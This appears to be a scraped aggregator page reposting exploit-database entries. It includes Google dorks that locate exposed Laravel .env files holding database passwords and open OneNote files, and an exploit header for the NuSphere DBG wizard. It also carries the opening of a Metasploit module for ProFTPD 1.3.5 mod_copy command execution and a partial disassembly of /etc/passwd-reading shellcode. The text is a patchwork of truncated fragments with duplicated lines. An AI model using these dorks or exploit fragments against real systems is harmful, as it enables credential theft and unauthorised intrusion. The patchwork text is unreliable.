White Paper: Developing MIPS Exploits to Hack Routers
Title: Developing MIPS Exploits to Hack Routers
Author: Onur Alanbel
Title: Developing MIPS Exploits to Hack Routers
Author: Onur Alanbel
Title: Privilege Escalation via Client Management Software
Author: SySS GmbH
Google dork Description: intext:DB_PASSWORD ext:env
Google search: intext:DB_PASSWORD ext:env
Submited: 2015-05-29
This dork finds env files, usually used in Laravel configuration,
containing passwords and other juicy information.
Author: Augusto Pereira
Google dork Description: inurl:/dbg-wizard.php
Google search: inurl:/dbg-wizard.php
Submited: 2015-06-03
# Exploit Title: Nusphere PHP DBG wizard
# Date: 02-06-2015
# Vendor Homepage: http://www.nusphere.com
# Software Link: http://www.nusphere.com/products/dbg_wizard_download.htm
# Version: any
# Exploit Author: Alfred Armstrong
# Contact: http://twitter.com/alfaguru
# Website: http://figure-w.co.uk
DBG Wizard is meant to be used with the DBG PHP debugger as an aid to
configuring it correctly. It is supplied as a PHP script […]
Google dork Description: intitle:”index of” “onetoc2” “one”
Google search: intitle:”index of” “onetoc2” “one”
Submited: 2015-06-04
# Exploit Title: intitle:”index of” “onetoc2” “one”
# Google Dork: intitle:”index of” “onetoc2” “one”
# Date: 04/06/2015
# Exploit Author: Sphearis
# Vendor Homepage: NA
# Software Link: NA
# Version: NA
# Tested on: ALL
# CVE : NA
This dork allows you to see Onenote files stored in the open(*.one). […]
Advanced Ethical Hacking Institute in Pune
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require ‘msf/core’
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
‘Name’ => ‘ProFTPD 1.3.5 Mod_Copy Command Execution’,
‘Description’ => %q{
This module exploits the SITE CPFR/CPTO commands in ProFTPD version 1.3.5.
Any unauthenticated client can leverage these commands to copy files from any
part of the […]
Advanced Ethical Hacking Institute in Pune
Linux/x86 – /etc/passwd Reader – 58 bytes
#Greetz : Bomberman(Leader),wiremask.eu
#Author : B3mB4m
#Info
#File descriptor on EBX
#Buffer on ECX
#Bytes to read on EDX
Disassembly of section .text:
08048060 <.text>:
8048060: 31 c9 xor %ecx,%ecx
8048062: 31 c0 xor %eax,%eax
8048064: 31 d2 xor %edx,%edx
8048066: 51 push %ecx
8048067: b0 05 mov $0x5,%al
8048069: 68 73 73 77 64 push $0x64777373
804806e: 68 […]